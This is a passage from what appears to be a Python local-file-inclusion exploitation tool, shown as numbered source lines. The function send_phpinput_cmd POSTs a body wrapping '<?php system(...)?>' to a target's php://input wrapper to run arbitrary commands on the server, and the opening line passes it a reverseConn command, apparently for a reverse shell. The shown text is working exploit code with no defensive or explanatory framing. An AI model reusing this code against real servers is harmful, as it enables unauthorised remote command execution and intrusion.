(cmd, inputurl)
| 1177 | send_phpinput_cmd(reverseConn,inputurl) |
| 1178 | |
| 1179 | def send_phpinput_cmd(cmd, inputurl): |
| 1180 | global gen_headers |
| 1181 | |
| 1182 | if(inputurl[-11:] == "php://input"): |
| 1183 | inputurl = inputurl[:-11] |
| 1184 | |
| 1185 | url = "%sphp://input" %(inputurl) |
| 1186 | phpcmd = cmd[:6] == "php://" |
| 1187 | body = "" |
| 1188 | |
| 1189 | if(phpcmd): |
| 1190 | cmd = cmd[6:] |
| 1191 | length = 27+len(cmd) |
| 1192 | body = "AbracadabrA ** <?php %s?> **" %cmd |
| 1193 | else: |
| 1194 | length = 34+len(cmd) |
| 1195 | body = "AbracadabrA ** <?php system('%s');?> **" %cmd |
| 1196 | |
| 1197 | gen_headers['Content-Length'] = '%s' %length |
| 1198 | r = requests.post(url=url, headers=gen_headers, data=body) |
| 1199 | |
| 1200 | return r.text |
| 1201 | |
| 1202 | def extract_phpinput_res(resp): |
| 1203 | strs = SubstrFind(resp,"AbracadabrA **") |
no outgoing calls
no test coverage detected